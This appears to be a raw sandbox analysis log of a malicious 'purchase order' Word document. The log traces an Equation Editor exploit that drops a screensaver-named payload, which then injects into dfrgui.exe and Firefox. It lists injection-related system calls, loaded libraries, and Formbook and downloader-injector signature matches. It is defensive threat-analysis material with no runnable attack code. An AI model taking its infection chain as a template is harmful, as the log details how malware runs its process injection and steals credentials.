            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B0C3 NtCreateSection,6_2_0040B0C3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B2E3 NtMapViewOfSection,6_2_0040B2E3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040AA93 NtSetContextThread,6_2_0040AA93
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040BBB3 NtDelayExecution,6_2_0040BBB3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040ACA3 NtResumeThread,6_2_0040ACA3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B513 NtCreateFile,6_2_0040B513
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040A673 NtSuspendThread,6_2_0040A673
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0042BF43 NtClose,6_2_0042BF43
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040B743 NtReadFile,6_2_0040B743
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040BFD3 NtAllocateVirtualMemory,6_2_0040BFD3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA07AC NtCreateMutant,LdrInitializeThunk,6_2_00EA07AC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9F9F0 NtClose,LdrInitializeThunk,6_2_00E9F9F0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00E9FAE8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00E9FB68
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E9FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00E9FDC0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EA00C4 NtCreateFile,6_2_00EA00C4
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA0060 NtQuerySection, 6_2_00EA0060
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA0078 NtResumeThread, 6_2_00EA0078
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA0048 NtProtectVirtualMemory, 6_2_00EA0048
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA01D4 NtSetValueKey, 6_2_00EA01D4
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA010C NtOpenDirectoryObject, 6_2_00EA010C
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA0C40 NtGetContextThread, 6_2_00EA0C40
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA10D0 NtOpenProcessToken, 6_2_00EA10D0
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA1148 NtOpenThread, 6_2_00EA1148
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9F8CC NtWaitForSingleObject, 6_2_00E9F8CC
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9F938 NtWriteFile, 6_2_00E9F938
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA1930 NtSetContextThread, 6_2_00EA1930
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9F900 NtReadFile, 6_2_00E9F900
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FAD0 NtAllocateVirtualMemory, 6_2_00E9FAD0
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FAB8 NtQueryValueKey, 6_2_00E9FAB8
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FA50 NtEnumerateValueKey, 6_2_00E9FA50
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FA20 NtQueryInformationFile, 6_2_00E9FA20
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FBE8 NtQueryVirtualMemory, 6_2_00E9FBE8
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FBB8 NtQueryInformationToken, 6_2_00E9FBB8
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FB50 NtCreateKey, 6_2_00E9FB50
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FC90 NtUnmapViewOfSection, 6_2_00E9FC90
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FC60 NtMapViewOfSection, 6_2_00E9FC60
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FC48 NtSetInformationFile, 6_2_00E9FC48
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FC30 NtOpenProcess, 6_2_00E9FC30
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FD8C NtDelayExecution, 6_2_00E9FD8C
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00EA1D80 NtSuspendThread, 6_2_00EA1D80
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FD5C NtEnumerateKey, 6_2_00E9FD5C
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FED0 NtAdjustPrivilegesToken, 6_2_00E9FED0
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FEA0 NtReadVirtualMemory, 6_2_00E9FEA0
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FE24 NtWriteVirtualMemory, 6_2_00E9FE24
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FFFC NtCreateProcessEx, 6_2_00E9FFFC
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FFB4 NtCreateSection, 6_2_00E9FFB4
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: 6_2_00E9FF34 NtQueueApcThread, 6_2_00E9FF34
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 99E91AE250C955BD403EC1A2321D6B11FCB715BDCC7CB3F63FFB46B349AFDE5C
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: String function: 00F1F970 appears 84 times
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: String function: 00EADF5C appears 137 times
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: String function: 00EAE2A8 appears 60 times
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: String function: 00EF373B appears 253 times
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Code function: String function: 00EF3F92 appears 132 times
            Source: sqlite3.dll.8.dr, Static PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\dfrgui.exe, Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
            Source: MOQ010524Purchase order.doc, type: SAMPLE, Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.op55336.scr.3506390.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.d40000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.24a19c4.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: opp[1].scr.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: op55336.scr.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, DarkListView.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, DarkListView.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, DarkComboBox.cs, Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, DarkComboBox.cs, Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winDOC@11/15@22/12
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$Q010524Purchase order.doc
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Mutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR6537.tmp
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\dfrgui.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.dr, Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: MOQ010524Purchase order.doc, Virustotal: Detection: 41%
            Source: MOQ010524Purchase order.doc, ReversingLabs: Detection: 36%
            Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Process created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe, Process created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
            Source: C:\Windows\SysWOW64\dfrgui.exe, Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dwmapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: version.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: secur32.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: winhttp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: webio.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: iphlpapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: winnsi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dnsapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: nlaapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: credssp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: ncrypt.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: bcrypt.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: bcrypt.dll
            Source: C:\Users\user\AppData\Roaming\op55336.scr, Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: virtdisk.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: fltlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sxshared.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: MOQ010524Purchase order.LNK.0.drLNK file: ..\..\..\..\..\Desktop\MOQ010524Purchase order.doc
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\op55336.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
